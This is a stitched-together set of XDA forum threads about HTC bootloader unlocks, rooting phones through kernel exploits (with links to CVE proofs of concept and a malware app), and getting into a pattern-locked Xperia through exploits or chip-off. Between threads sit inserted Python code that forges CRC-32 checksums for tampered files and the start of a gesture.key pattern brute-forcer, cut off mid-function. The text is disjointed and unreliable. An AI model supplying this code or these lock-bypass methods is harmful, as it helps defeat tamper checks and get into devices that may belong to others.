Today I spotted this blog item http://blog.htc.com/2012/04/your-phone-your-thoughts-tell-us-what-you-think/ I think we should start posting our concerns about not being able to gain a proper unlock.
(1) fastboot boot awesomeRecovery.img (this works because fastboot then boots recovery on the boot/temporary partition, so you're not actually in recovery mode.)
(2) Offmode (this works because again you're not technically in recovery mode. It uses the recovery ramdisk, kernel, and binaries, but it's still not technically recovery.)
On that note, I've seen suggestions that it's possibly a recovery issue with CWM and TWRP. Unfortunately it doesn't appear to be the case. If it were, then in CWM you wouldn't have USB when you fastboot boot the recovery or in offmode (fair assumption, since both these options use the same kernel, ramdisk and binaries as recovery?). Can it be fixed? Not that I know of. It looks to me like a total radio or bootloader lockout from using USB in recovery, which means on a radio or bootloader level USB is disabled in recovery mode.
On that note, I think we should raise the point to HTC that this locking down of the device does not suit our needs. Key points of fail would be as follows.
(1) Can NOT flash the boot partition from recovery. I've personally contacted HTC on this numerous times and they seem to just not care, responding with "It's a security issue" and so forth. I would love to know how this is a security issue of any sort. Every other Android device has this ability except HTC devices since they started the HTC unlock ordeal. It's utter fail IMHO and HTC should listen to our needs.
(2) Can NOT flash recovery or boot partitions from system. This issue is NOT a deal breaker and isn't so bad when it comes down to the nitty gritty. But since the issue above exists, flashing with applications like htc dumlock and such were our only options. These workaround apps can't be used to flash now because of the lockout from system, and it wouldn't be such an issue if HTC didn't lock us out in recovery from flashing boot.
(3) Can NOT flash P*IMG.zips in hboot/bootloader anymore. For the unlocked device running a custom firmware this is a must, especially when radio updates and such are needed from the OEM. We saw a big use of this on the Sensation when HTC updated the device from Gingerbread to Ice Cream Sandwich. The update required new hboots, radios, and partitioning to actually use. So instead of having to flash a RUU, which didn't exist, the only choice was to flash a custom P*IMG.zip that included all the radios and images needed to run the builds. At this point we can't update those images/partitions without flashing an RUU. This makes no sense and doesn't seem to do anything but make things more difficult for the unlocker to customize and modify their device.
(4) If all the conditions above HAVE to exist, then why not give us documentation or utilities to flash firmware.zips from recovery like HTC does? When HTC was the proud Nexus device there was full support and documentation available on how to flash firmware on their devices. This made anyone choosing an HTC device blessed with knowing that their device was not only open and unlocked, but that when flashing firmware it was being flashed correctly to Google and HTC's standards. This code has now been moved out of recovery since right before the move to edify scripting and moved to vendor/htc/ (not arguing this choice, as that's where it belongs from a maintaining point of view). But the problem is that vendor/htc is proprietary now, which means documentation and support for flashing firmware correctly is not available and is left to developers of recoveries for the community to figure out. One would think if HTC was standing behind us that they would step up and give us a PROPER/OPEN/REAL unlock, or if they can't for the lame excuse of security concerns, then give us the documentation and utilities to flash the boot and firmware partitions properly. I mean really... what is there to lose there?
(5) WHAT WAS THE POINT OF HTC UNLOCK? It was to reach out and accept us as a community. It was to keep us from having to exploit their firmware and look for holes to gain control of a device we rightfully own. WHAT DID HTC UNLOCK DO? It unlocked the devices at first, and with each new revision of the unlock it gets more locked down and harder for us to use it as intended. WHAT DOES THAT LEAD TO? It leads to us hoping someone will take the time out of their life and exploit HTC's firmware so we can have access and control of our devices. I mean, it's bad when you have people poking a device with a paperclip to get a device unlocked to avoid an official unlock.
Bottom line: I'm personally fed up with HTC's unlock. It's absolute crap! It does not serve the purpose it was intended for and only makes things harder than they were before. As a devoted HTC customer it has me questioning if my next device will be an HTC. With all the other options that would allow me to spend less time trying to gain proper access to my device and more time actually having fun with it, why choose HTC? Everyone else is shying away because of these same issues. Everyone with an HTC unlocked device waits for someone to exploit HTC's firmware and give them a proper unlock. Why not just choose a device without the locked down/unlock instead? IDK, but HTC needs to step up and listen to us. Every HTC forum with an HTC Unlock is screaming for these issues to be fixed.
My call to HTC is to fix these issues and/or give us proper documentation on flashing firmware to our devices via custom recoveries. The boot flashing lockout is dumb, pointless, and in NO WAY a security threat AT ALL, and is nothing more than a CRAP RESPONSE to something that they should be working to correct, instead of ignoring. In the end it's hurting HTC's relations with developers and is ultimately doing the opposite of what its original intent was.
HTC, PLEASE READ AND LISTEN!!!11ONEone
To everyone else, SPREAD THE WORD!!!ONEone
This is the future of HTC unlock, and with each new device it gets worse. Maybe HTC will listen and address these issues; then again, maybe we will just need to find another OEM that supports us and does listen.
From this thread : http://forum.xda-developers.com/showpost.php?p=25407373&postcount=19
I have posted the same in Facebook Page and Tweeted it. I think we should be more aggressive.
what about groubal?
Posted anyway :s
"There has been overwhelmingly customer feedback that people want access to open bootloaders on HTC phones. I want you to know that we've listened. Today, I'm confirming we will no longer be locking the bootloaders on our devices. Thanks for your passion, support and patience," Peter Chou, CEO of HTC
Please S-Off your devices as promised, your unlock is not a true unlock and it is still heavily restricted. We can't flash official RUUs in this weak htc-dev unlocked state! Please fulfil your promise!
You have some valid points, but you do realise us tinkerers aren't htc's only customers right? Most businessmen now use smartphones like the one X and they certainly do not fiddle with their phones, nor do they accept that their phone comes with serious security flaws potentially opening their device up to strangers or corporate espionage. This point, however, could be used both for and against this fact. For example, if HTC officially provided S-OFF via htcdev then they could avoid people developing exploits for their device while also causing the device to be factory reset when it is applied. The downside of this is their products could get a reputation for being unstable or whatever (people seeing my device for example, and getting the idea that all one X's are on the verge of exploding)
That doesn't seem to be an issue for Google or Samsung, so I don't think its a really valid point.
Rekoil said:
You have some valid points, but you do realise us tinkerers aren't htc's only customers right? Most businessmen now use smartphones like the one X and they certainly do not fiddle with their phones, nor do they accept that their phone comes with serious security flaws potentially opening their device up to strangers or corporate espionage. This point, however, could be used both for and against this fact. For example, if HTC officially provided S-OFF via htcdev then they could avoid people developing exploits for their device while also causing the device to be factory reset when it is applied. The downside of this is their products could get a reputation for being unstable or whatever (people seeing my device for example, and getting the idea that all one X's are on the verge of exploding)
I understand mate. That's why the S-OFF should be optional. I'm personally working in a corporate environment; most of them won't go for Android since our enterprise applications don't work well (like deployment of software apps etc.). Most of them prefer Blackberry or Windows based phones. That's why Windows 8 phone comes with secure boot and large scale application deployment with the same tools used in Windows, so they can convert the remaining BB users to Windows. Android has a long way to go to get attention from enterprise users. For now, think of it as an entertainment OS. Sony went a long way in this case: they allow complete unlock and even help FreeXperiaTeam with development of CM. Sooner or later our devs will find a way to S-OFF, so why not HTC offer it proactively and create good will with devs like Sony did.
S-OFF on any HTC phone does not, I repeat, does not open any other security issue, i.e. a business would not leave such a possibility open. Some businesses develop their own software for phones etc. and still do; they were doing it with the old PDA phones and HTC PDA phones, and HTC stopping locking their phones allows this option again to a business.
A business wouldn't leave a device open as they would lock them themselves via encryption etc., so people arguing over it opening security holes is an invalid point. Other devices are open, i.e. Samsung etc., so why not HTC? All other HTC devices that have been exploited to allow the same haven't broken any security regarding networks or the ability to change serials etc., as this info is on a write-once chip and can not be overwritten like some other devices in the past.
The reply from the HTC CEO has just made my day. It's great news; I just hope it's true to the word.
And believe it or not, there are loads of corporate businesses using Android devices to their full extent, well here in the UK they are, as it's such a powerful operating system and not just for entertainment. I speak from experience: I use my phone for business and use a lot of business apps etc., so my phone is not just for entertainment purposes.
Everyone's concern over security is a fair statement but not valid reason not to unlock and am glad to hear HTC agree now.
Sent from my HTC One X using xda app-developers app
@dryan433: Dude, what are you talking about? Have you ever heard about something called punctuation or capital letters?
Sent from my HTC One X using xda app-developers app
Related
I've been wondering about this for a while...
Can anyone tell me WHY we should be forced to root our phones to gain full access to them? Surely the action of locking down these phones so that we have to hack them goes completely against the entire point of Android?
Speaking as a user who will probably root his phone (and who has rooted other phones in the past), it does make sense for phone manufacturers/networks to not provide easily hackable phones for several reasons:
1). The reason you don't have root by default is that it makes it very, very easy for a malicious program to do nasty things. The same reason why I don't log in as root to my Linux servers unless it's absolutely required: I can accidentally (or intentionally) do stupid things as root that I could not do as a normal user.
2). HTC provides a warranty for the phone. Easy access to root would lead to (again) doing silly things like flashing a bad radio and bricking the phone... leading to HTC having to replace the phone.
Speaking as someone who rooted his Magic, I find that I have had no need to root my Desire as of yet (the main reason the Magic was rooted was to install a custom recovery so that I could flash unsigned ROMs to get Android 2.x or Sense on my Magic, both of which I already have on the Desire).
John
I can understand reasonable restrictions, but I really can't fathom the reason why they try so damned hard to stop us customizing our devices.
They should make an app for it, but make damned sure that the user is told that IF they unlock root access, they'll invalidate their warranty.
It's mostly so HTC and the carriers won't have to answer thousands of support requests from clueless owners who installed an app which ruins the OS.
You see, root access literally means "full access permissions", that means you can actually delete everything on the phone, including system files. Couple this degree of access with a marketplace like Android has and you soon have a real mess (when apps screw up or someone programs a virus app).
From an HTC point of view, I think it shouldn't be possible for anyone to mess up their phone to the point it becomes unusable. That's why there is no root support on the devices.
As for leaving the experienced user the choice: Do you actually think any normal user reads the part where it says "voids your warranty"? They'll go crying to HTC if something goes wrong and blog about how crappy and slow their phone (with root) is, while HTC have absolutely no control over the user experience.
The reasons why I rooted my Hero:
1. Flash a 2.1 rom.
2. Use Market Enabler to show paid applications in the Market. (I don't understand why this is disabled in some countries, when I'm allowed to create a Google Checkout account.)
3. Enable APS2SD. (It bugs me that even though Android doesn't allow installing apps on the SD card till now, high-end phones (AKA Desire) are still made with a 512MB ROM)
salahag said:
The reasons why I rooted my Hero:
1. Flash a 2.1 rom.
2. Use Market Enabler to show paid applications in the Market. (I don't understand why this is disabled in some countries, when I'm allowed to create a Google Checkout account.)
3. Enable APS2SD. (It bugs me that even though Android doesn't allow installing apps on the SD card till now, high-end phones (AKA Desire) are still made with a 512MB ROM)
I'm not asking why people have rooted, I'm asking why we should HAVE to. Things like APS2SD are perfectly legitimate reasons to need root access, and we shouldn't have to be forced to invalidate our warranty just to get some functionality that Google haven't implemented in their OS yet.
FloatingFatMan said:
I'm not asking why people have rooted, I'm asking why we should HAVE too. Things like APS2SD are perfectly legitimate reasons to need root access, and we shouldn't have to be forced to invalidate our warranty just to get some functionality that Google haven't implemented in their OS yet.
Well, at least it's one up from an iPhone! I mean, seriously, at first you had to "jailbreak" to get copy and paste, and that's just one example.
Hello and greetings to all, this is my first XDA post so please be gentle with me...
I recently started pondering one of the problems I see a lot of people surfing these forums suffering from, the dreaded "Bricked Device".
For whatever reason, generally through no fault of your own, you may end up with a bad flash that results in your device becoming a worthless but very expensive paperweight. :crying:
Some examples of people suffering a bricked device:
http://forum.xda-developers.com/showthread.php?t=2229416
http://forum.xda-developers.com/showthread.php?t=2275035
http://forum.xda-developers.com/showthread.php?t=1926098
After doing a lot of research myself after suffering something similar, I started to notice the general theme is always the same: people saying "wait for the device manufacturer to release the NVFlash!"
However, in these instances shown above the RETAILER in question is ASUS, and they are never going to release any kind of source to any kind of NVFlash. Because if they did, you have to reflect that it would put them out of business. It's far more lucrative for the RETAILER (not the manufacturer) to just sit back and wait till you've got a problem with a shoddy update and then push selling you a new motherboard for your device. A new motherboard that in all likelihood you don't even need, and if you send in the device for repair you would probably never even see it being placed into the device in the first place, when all they have to do is fix your broken bootloader.
Because the reality is, the Manufacturer, being "TEXAS INSTRUMENTS", has already made the full source of the NAND Flash to these devices readily available to the RETAILER and their partners in business.
It may surprise you and a lot of other people to learn that in fact you can already download The Official TEXAS INSTRUMENTS FLASH TOOL Ver: 1.6.0.0 from the following link: http://www.ti.com/tool/flashtool
Complete with the entire walkthrough guide available here: http://processors.wiki.ti.com/index.php/Flash_v1.6_User_Guide
I know there are a lot of people out there on this forum that have been looking for this tool, so I decided I would make my first post a link to the Bootloader Reflashing Tool for the majority of all ARM or OMAP based devices.
Please don't ask me how it works. I'm happy to sit back and let those out there with more experience in these matters take the plunge for themselves, if it means in the long run we can all finally put Linux onto the Android Touch device with relative ease and recover from stupidness such as a bricked device because of a crappy bootloader update where the RETAILER decides in their infinite wisdom to remove USB device support from the Jelly Bean Bootloader...
On the plus side, this means that in the near future when the right people get their hands on this tool (from the Manufacturer) we can all expect to see some far more funky flashing startup screens and some rad custom bootloaders :victory:
Thank you for taking the time to read my first post...
P.S: I also nearly forgot to mention this is the tool that LOCKS and UNLOCKS the Bootloader, so once people start making Bootflashes for their device to use with this tool then you won't see "Your Device is Unlocked" in your face every time you turn on the device! (I wonder if that means we can recover our warranty; I can almost hear ASUS squeak in protest!)
REALLY? Nobody knows how to work with this tool???
REALLY????
I don't believe this....
I have a TF300TG bricked... I want to TRY any solution...!!!!
BR
Mihnea
This thread is intended for the Droid Turbo 2. For the lucky Moto X Force owners, this thread shouldn't apply to you.
I think there are some brilliant minds lurking on this forum and I'm hoping there could be some research done to "encourage" the possibility of attaining root and boot loader access on our Droid Turbo 2 Devices.
My approach here is to establish a collection of "Zero Day Bugs": security flaws found in our devices that would put our OS at risk. As far as I can tell, Google keeps a record database and the media likes to talk about zero-day discoveries. Of course these bugs need to be timely, so zero-day flaws found in 2014 or early 2015 likely were patched with the launch of the DT2.
For example, below is a link to a Zero-Day exploit that elevates the privileges of an app. Can something like this be used? Who has the technical expertise to replicate such an exploit? This thread is to talk about these things.
http://perception-point.io/2016/01/...f-a-linux-kernel-vulnerability-cve-2016-0728/
Hopefully this will spur up some traction and help get us root and bootloader.
Exploit found for Turbo 2 that can grant root access
Given the widespread impact of this exploit, it is likely other device owners are going to try to implement this exploit as well. Please post here if you find any implementations for other devices as it may be usable for the Turbo 2.
It has been confirmed that Quadrooter can exploit the Turbo 2: http://www.zdnet.com/article/quadrooter-security-flaws-affect-over-900-million-android-phones/
Four vulnerabilities (CVE-2016-2059, CVE-2016-2504, CVE-2016-2503, CVE-2016-5340)
And just an FYI:
"ALLOW OEM UNLOCKING" DOES NOTHING ON THE DROID TURBO 2
windraver said:
This thread is intended for the Droid Turbo 2. For the lucky Moto X Force owners, this thread shouldn't apply to you.
I think there are some brilliant minds lurking on this forum and I'm hoping there could be some research done to "encourage" the possibility of attaining root and boot loader access on our Droid Turbo 2 Devices.
My approach here is to establish a collection of "Zero Day Bugs". Security flaws found in our devices that would put our OS as risk. As far as I can tell, Google keeps a record database and the media likes to talk about zero-day discoveries. Of course these bugs need to be timely so zero-day flaws found in 2014 or early 2015 likely were patched with the launch of the DT2.
For example, below is a link to a Zero-Day exploit that elevates the privileges of an app. Can something like this be used? Who has the technical expertise to replicate such an exploit? This thread is to talk about these things.
http://perception-point.io/2016/01/...f-a-linux-kernel-vulnerability-cve-2016-0728/
Hopefully this will spur up some traction and help get us root and bootloader.
Could be used on a Terminal Simulator and get the bootloader lock transistor to break safety.
But honestly, my first thought would be to force into QHSUSB_DLOAD and somehow inject all XT1580 stuff to get it recognized as such.
I have installed one-click root (I got it through another site, not from them) and it sometimes says failed to root, but other times it goes through the process, says it's done and to reboot, but when rebooting it does not have root. I have tried running other apps, like King Root, or Root Genius, or half a dozen others to get it to root, after getting one-click to say it has rooted it. Not sure if this will help or not, and honestly, I'm to the point where I'm ready to give up and do something different. I WILL NEVER buy another Verizon phone, ever! I may not drop them as a carrier, but I won't be keeping their crappy locked junk.
brannonwj said:
rant
From what I understand, this thread is for brainstorming. Not ranting about how you didn't do your research.
not a rant
Techn0Luigi said:
From what I understand, this thread is for brainstorming. Not ranting about how you didn't do your research.
That wasn't a rant about how I didn't do any research. It was what I did that might lead to someone having an idea of how it might help.
Don't be a jerk.
mr_verystock said:
Could be used on a Terminal Simulator and get the bootloader lock transistor to break safety.
But honestly, my first thought would be to force into QHSUSB_DLOAD and somehow inject all XT1580 stuff to get it recognized as such.
Can you explain the QHSUSB_DLOAD more?
QHSUSB_DLOAD (Qualcomm High-Speed USB Download Mode)
Man... It's been a while. Haven't had fun with any of this.
The bootloader starts and checks everything. There are 3 stages of the bootloader: 1 starts TZ, 2 something else, and by 3 everything is booted and then it loads fastboot. QHSUSB_DLOAD is baked into the hardware. If the bootloader file is missing (.sbn) or doesn't match the magic key (.hex) then booting fails. Most of the stuff turns off except for the CPU (in this case, ARM Cortex A53 and A78) and communications (USB interface), and it is stuck at QHSUSB_DLOAD. From there, you can load anything raw into the phone. So you can bring over the partitions that are used to boot (so in this case, you may be able to bring over something that damages the TZ transistor, thereby unlocking the bootloader). What you bring over exactly for the bootloader unlock hasn't been discovered even with the original Moto X (2013). However, that's how root is done: bring over the blocks of the OS that contain the root blocks, and the bootloader doesn't know a thing.
Bringing over a valid .sbn and .hex file and forcing the phone CPU to reset would bring the phone back from the missing bootloader, and then fastboot loads, followed by the OS (if the Linux core is present, the boot sector there, but that's another topic).
They rooted the phone in China, they sell it rooted!! Here is the link
m.intl.taobao.com/detail/detail.html?id=521809261322&spm=0.0.0.0
mr_verystock said:
QHSUSB_DLOAD (Qualcomm High-Speed USB Download Mode)
Man... It's been a while. Haven't had fun with any of this.
The bootloader starts and checks everything. There are 3 stages of the bootloader. 1 starts TZ, 2 something else, by 3 everything is booted and then it loads fastboot. QHSUSB_DLOAD is baked into the hardware. If the bootloader file is missing (.sbn) or doesn't match magic key (.hex) then booting fails. Most of the stuff turn off except for the CPU (in this case, ARM Cortex A53 and A78) and communications (USB interface), and it is stuck at QHSUSB_DLOAD. From there, you can load anything raw into the phone. So you can bring over the partitions that is used to boot (so in this case, you may be able to bring over something that damages TZ transistor, thereby unlocking bootloader). What you bring over exactly for the bootloader unlock, it hasn't been discovered even with the original Moto X (2013). However, that's how root is done. Bring over the blocks of the OS that contains the root blocks, and the bootloader doesn't know a thing.
Bring over a valid .sbn and .hex file and forcing the phone CPU to reset would bring the phone back from the missing bootloader, and then fastboot loads, followed by the OS (if the Linux core is present, the boot sector there, but that's another topic).
I'd like to see a Verizon phone rooted. That is the version I have and most in the U.S. have as well.
Sent from my XT1585 using Tapatalk
I finally updated my Turbo 2, losing hope on a root exploit.
Then I read this.
http arstechnica dot com/security/2016/06/godless-apps-some-found-in-google-play-root-90-of-android-phones (sorry, longtime lurker, just registered, can't post links)
It might lead to nothing, but maybe for those who haven't updated an exploit can be found with the godless apps?
The godless app is a hack that steals your data. If it did work, (which from what I understand it only works on 5.1 and below) you'd risk your personal and financial data being stolen and sold.
Alaadragonfire said:
They rooted the phone in China , they sell it rooted!! Here is the link
m.intl.taobao.com/detail/detail.html?id=521809261322&spm=0.0.0.0
Any luck in contacting the seller on how it is rooted?
I'm sure they use stolen Lenovo/Motorola factory development "engineering" software which unlocks the bootloader. It's the same phone as the Moto X Force but with locked down bootloader.
There were similar Droid Turbo phones being sold with unlocked bootloader a year ago in China, months before the Sunshine exploit was found.
gizzardgulpe said:
I finally updated my Turbo 2, losing hope on a root exploit.
Then I read this.
http arstechnica dot com/security/2016/06/godless-apps-some-found-in-google-play-root-90-of-android-phones (sorry, longtime lurker, just registered, can't post links)
It might lead to nothing, but maybe for those who haven't updated an exploit can be found with the godless apps?
I don't have my DT2, but here's a link to one of the apps in case someone wants to try
https://apkpure.com/summer-flashlight/com.foresight.free.flashlight?hl=en
I'm usually just lurking here and grab ROMs and exploits when they pop up, but I have something to add. Has anyone unlocked the developer settings? There's a toggle named 'OEM unlocking' with a subtext of 'allow the bootloader to be unlocked'. Does this mean the bootloader can be unlocked? The last Verizon phone I had was a G3, and the only way to gain a faux unlock was to use 'bump' to install TWRP. Could this be possible with the Turbo 2? I'm not a coder or anything, but just trying to add to the think tank here.
This setting does nothing.
damkol said:
This setting does nothing.
There really should be a sticky saying "ALLOW OEM UNLOCKING DOES NOTHING ON THE DT2"
Droid turbo 2
After spending countless hours trying to unlock my bootloader to root my phone, I'm at an impasse. I've been told the Verizon and AT&T models aren't able to be unlocked. I will keep trying to get around this to root and install custom ROMs, if anyone has any tips.
Rhydenallnight said:
After spending countless hours trying to unlock my bootloader to root my phone I'm at an impasse I've been told the Verizon and at&t models arnt able to be unlocked I will keep trying to get around this to root and install custom roms if anyone has any tips
Crack the case, hook up some leads (microscope) and dump the memory for the bootloader is the only thing I can think of. Don't know if that is even possible with that memory. It's probably integrated with other stuff.
Sent from my XT1585 using Tapatalk
Update: Oh yeah, it's encrypted. Guess that won't work.
Found something. Does anyone know if this vulnerability exists on the Droid Turbo 2?
CVE-2015-1805
http://www.computerworld.com/articl...itical-android-root-vulnerability-itbwcw.html
There is a proof of concept out there. Has anyone tried it?
https://github.com/dosomder/iovyroot
Hi,
My wife's HTC M9 (UK, Vodafone, latest stock ROM, no root) was turned off last night to charge.
When booted up it does the below. It does not load into the OS. Every boot loops into the below.
https://drive.google.com/file/d/0B8n21CQX7535cjF4MnZqV2E1dGM/view?usp=sharing
It says the software has been modified?
My wife was very insistent that I never root or change ROMs on her phone.
Does anyone have a fix or is this send off for replacement?
Any advice would be greatly appreciated.
Thanks
Ca1v
ca1v said:
Hi,
My wife's HTC M9 (UK, Vodafone, latest stock ROM, no root) was turned off last night to charge.
When booted up it does the below. It does not load into the OS. Every boot loops into the below.
https://drive.google.com/file/d/0B8n21CQX7535cjF4MnZqV2E1dGM/view?usp=sharing
It says the software has been modified?
My wife was very insistent that I never root or change ROMs on her phone.
Does anyone have a fix or is this send off for replacement?
Any advice would be greatly appreciated.
Thanks
Ca1v
What happens if you try to boot to Download Mode? I guess you see the black screen that is mentioned in Q7, right? If that's the case there isn't much you can do...
Download mode seems to be working (https://drive.google.com/file/d/0B8n21CQX7535cEFhTlpnajF5anM/view?usp=sharing)
If this is the case, can you point me in the right direction to get it resolved?
Many thanks for the help
Interesting. Your video in post 1 shows a security warning. That means that the OS got deleted. This is only possible if you unlock the bootloader and delete it manually via TWRP or if the EMMC gets broken. Since the phone's S-ON and its bootloader is locked and not unlocked or relocked I assumed that the latter happened*.
As long as the download mode is working you can restore the system with the help of a RUU. Instructions can be found in the thread I linked in my last post. Be aware that all data on the phone is going to get erased.
* Well, it is possible to get the phone's status back to S-ON and locked with S-OFF but you said you never tinkered with that phone...
Flippy498 said:
Interesting. Your video in post 1 shows a security warning. That means that the OS got deleted.
Just thought I'd bring to your attention that apps are now being written that will try to obtain root without you knowing. The reason is that they can steal any information they want and sell it to corporations for as little as 4 pence/6c a record.
It is possible that it is a failed root by an app.
"I'm safe, I only download my apps from google playstore" - nope, you're not.
"I only use signed apps and the checksum is always correct" - nope, checksum can be matched with padding.
"I only use external sources to update genuine apps" - nope, see the Google playstore comment above.
"I have all my security and privacy set to super strict, I have my apps verified by google" - nope, still not secure because alerts are only written when the malicious/bad code is found.
Be warned, my fellow xda'ers. There is a whole new breed of security breach and it is terminal to root as a whole. Apps like kingoroot etc are issuing the wrong type of people with the wrong type of information and they are using it for the wrong purposes.
Google will struggle to put a lid on these types of apps because they attack the hardware for access to software (a simple memory buffer overflow attack), inject a few lines of code and you're in, permanently. It will eventually result in a total lockdown at the manufacturer and bye bye root access, ROMs, mods etc; you'll get what you're given.
How do we prevent this? We don't and we can't. We just have to sit back and watch as the world takes our privacy while bricking our devices one by one just to "try" to earn a poxy 4p.
Beamed in by telepathy.
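The post above says a checksum "can be matched with padding". The following is an added example (not the poster's code, and not anything from the thread) that shows exactly what that claim does and does not cover: appending four chosen bytes forces a file's CRC-32 to any target value, which is why a CRC or similar checksum is not an integrity check, while a cryptographic hash such as SHA-256 (and, by extension, an APK signature over that hash) is not defeated this way. The "genuine" and "tampered" byte strings are constructed for the demonstration.

```python
"""Added example: why a plain checksum is not an integrity check.

Appending four chosen bytes to any file forces its CRC-32 to any target,
so a matching CRC proves nothing about tampering. A cryptographic hash
(or an APK signature) cannot be matched this way.
"""
import hashlib
import zlib

POLY = 0xEDB88320  # reflected CRC-32 polynomial, the one zlib uses


def _make_table():
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ POLY if c & 1 else c >> 1
        table.append(c)
    return table


TABLE = _make_table()
# The top byte of every table entry is distinct (the 8 feedback vectors are
# linearly independent), so the top byte identifies the entry that produced it.
REVERSE = {entry >> 24: idx for idx, entry in enumerate(TABLE)}
assert len(REVERSE) == 256


def crc32(data: bytes) -> int:
    return zlib.crc32(data) & 0xFFFFFFFF


def forge_crc32_suffix(data: bytes, target: int) -> bytes:
    """Return 4 bytes s such that crc32(data + s) == target."""
    # zlib returns ~register; undo the final inversion to get the register state.
    reg = crc32(data) ^ 0xFFFFFFFF
    want = (target & 0xFFFFFFFF) ^ 0xFFFFFFFF
    # Walk backwards from the wanted register: each step's top byte fixes
    # which table entry the appended byte must select.
    idxs = []
    cur = want
    for _ in range(4):
        idx = REVERSE[cur >> 24]
        idxs.append(idx)
        cur = ((cur ^ TABLE[idx]) << 8) & 0xFFFFFFFF
    idxs.reverse()
    # Walk forwards from the real register, picking each byte so that
    # (register low byte XOR byte) hits the required table index.
    out = bytearray()
    for idx in idxs:
        out.append((reg & 0xFF) ^ idx)
        reg = TABLE[idx] ^ (reg >> 8)
    return bytes(out)


def tamper_keeping_crc(original: bytes, modified: bytes) -> bytes:
    """Give `modified` the same CRC-32 as `original` by appending 4 bytes."""
    return modified + forge_crc32_suffix(modified, crc32(original))


def integrity_report(original: bytes, candidate: bytes) -> dict:
    """Compare a checksum check with a cryptographic hash check."""
    return {
        "crc32_matches": crc32(original) == crc32(candidate),
        "sha256_matches": hashlib.sha256(original).digest()
        == hashlib.sha256(candidate).digest(),
    }


if __name__ == "__main__":
    # Constructed sample content standing in for a genuine and a tampered file.
    genuine = b"package: com.example.app\nversion: 1.0\n"
    tampered = b"package: com.example.app\nversion: 1.0\nextra: payload\n"
    forged = tamper_keeping_crc(genuine, tampered)
    print(integrity_report(genuine, forged))
```

Running the block reports `crc32_matches` as True and `sha256_matches` as False: a check that compares only a CRC (or a file size) accepts the tampered copy, a hash or signature check does not. The reverse walk works because CRC-32 is linear and each appended byte only ever affects the register through one table lookup; nothing comparable exists for SHA-256.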
@shivadow: I'm actually not sure what you're trying to achieve with your post. Malicious apps that can root your device without letting the user know about it have existed for several years now. (Click here for a random example from 2011) Smartphones aren't completely safe and they never were. Everyone who's claiming the opposite either doesn't know what he/she is talking about or is simply lying.
To name just a few more android security flaws/exploits that emerged in the past: rageagainstthecage, gingerbreak, heartbleed, stagefright, the master key vulnerability, the futex bug, rootnik...
All of these have more or less been used for manipulating android phones. There is no absolute security. Android is still as secure/insecure as it's always been.
In addition, several OEMs have already been trying to prevent their customers from rooting their phones for several years. Samsung's KNOX is a perfect example. (I don't want to discuss whether they're successful. That's a whole different topic.)
But let's get back to the deleted OS of the OP's phone: I've never heard about failed root attempts that erase a complete system partition. Therefore, I highly doubt that a malicious app caused all the trouble. Failed root attempts may cause a bootloop but they don't wipe your phone. Just think about the following: How should the dev of such an app gain money if the app deletes OSes? Without an OS there is no information you can steal, and if you have no information you could sell/abuse/whatsoever you don't gain any money. Oh, and not to forget that most apps on the Play Store already collect more than enough data from your phone that they can sell afterwards without having to root it.
I meant failed root could be the cause; if the OP didn't, then who did? If no one modded it then dead NAND is the only player.
I agree with everything else, but I don't trust those apps that try to gain root in the background to steal data and I think it's too easy for them to bugger your phone just for the sake of making a few coins. Face it, if I was doing it, once I had what I wanted I wouldn't care about the device. Sod the gracious exit and all that jazz. No evidence, no conviction.
Maybe I'm being ott but my questions and points are still valid.
This is a proper "who dunnit" because I doubt it died of its own accord.
Knox is for businesses btw. If knox is triggered, which is very easy to do, the business is advised not to buy the device as it "may" have been compromised. But if no company secrets are being held on the device then it's still good to use. Knox protection was counteracted by supersu. In a nutshell, unless you run a company knox is of no concern to the everyday user.
Just thought I'd chuck that in there, I'm versed in the arts of the s3 i9300. I moved from that phone to this m9.
Beamed in by telepathy.
Hi
I'm new to the forum but have been doing a fair amount of research. I am stuck now though and would like a bit of help.
My situation is that I have a Xperia XA1 ultra (I know I should post in that device specific forum but not much seems to be happening there) I have a very specific problem that I have treated like a forensics problem.
The phone is locked by a pattern which has been guessed by another person so many times that the gatekeeper only allows one entry per day, provided the phone is charged; otherwise the timer resets.
It has not been rooted and ADB is disabled.
I have connected to it through fastboot and what I can gather is that it is running Android Oreo.
The system details are as follows:
Product: XA1 Ultra G3221
Build Number: 48.1.A.0.129
Chipset: Mediatek MT6757 Helio P20
Bootloader: Locked
My research has led me to the possibility of loading a recovery image into the RAM of the phone and accessing ADB that way. I tried this with a TWRP image but obviously it didn't work. There is a company called Cellebrite that claims to be able to load its own boot/recovery image into the bootloader and gain entry that way; however, the license is something like £10,000. I'm definitely not a commercial customer.
The final option for me would be to dump the memory via JTAG or chipoff, the contents would be encrypted but I found a blog where somebody had managed to find the location of the gesture.key file while the system was encrypted. I can't remember what the site was called though, it took me ages to find last time.
My main questions are: does Sony sign the boot image with its own keys, or does it use the standard Android Verified Boot?
Does Sony reuse the same keys for signing across devices? Likely not but maybe
Is there a way to send specific instructions to the RAM via fastboot?
Does anybody know of an exploit that could be used?
Is there a way to extract the boot.img and recover the Sony keys?
If there any other docs, resources or ways to get the data that could help, I will gladly read and/or try them. I think this forum is probably the biggest resource one though but after a while the specific information needed gets harder to find.
The main thing is that I don't unlock the bootloader and flash anything. It's all got to be live and non data damaging.
I tried MTPwn on the off chance that it would work but nope, it was a no go.
If there was a way to utilise the mediatek exploit to gain entry from fastboot that would be excellent, or to use fastboot to dump the memory.
Thanks for reading, I hope someone can help.
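The post above mentions locating gesture.key in a dump, and the Gatekeeper retry throttle. As an added example (not the poster's code or any tool from the thread), here is what recovering a pattern from gesture.key actually involves: on Android versions before 6.0 the file holds an unsalted SHA-1 over the pattern's cell indices (0-8, row-major), and the lock screen only records patterns in which no unvisited cell is skipped, so the entire space of 389,112 valid 4- to 9-cell patterns can be hashed and compared in a few seconds. The caveat for the device in question is that since Android 6.0 the pattern is verified through Gatekeeper (gatekeeper.pattern.key, scrypt plus an HMAC under a device-bound key), so a dump from an Oreo device cannot be cracked offline this way, and the lengthening retry timeouts described are Gatekeeper enforcing that. The digest checked below is constructed from a known pattern.

```python
"""Added example: brute-forcing a legacy (pre-Android 6.0) gesture.key.

gesture.key = SHA-1(bytes of the pattern's cell indices). The lock screen
never records a pattern that jumps over an unvisited cell, so the search
space is the 389,112 valid patterns of 4 to 9 cells.
"""
import hashlib
from typing import Iterator, List, Optional

GRID = 3  # 3x3 pattern grid, cells numbered 0..8 row-major


def _midpoint(a: int, b: int) -> Optional[int]:
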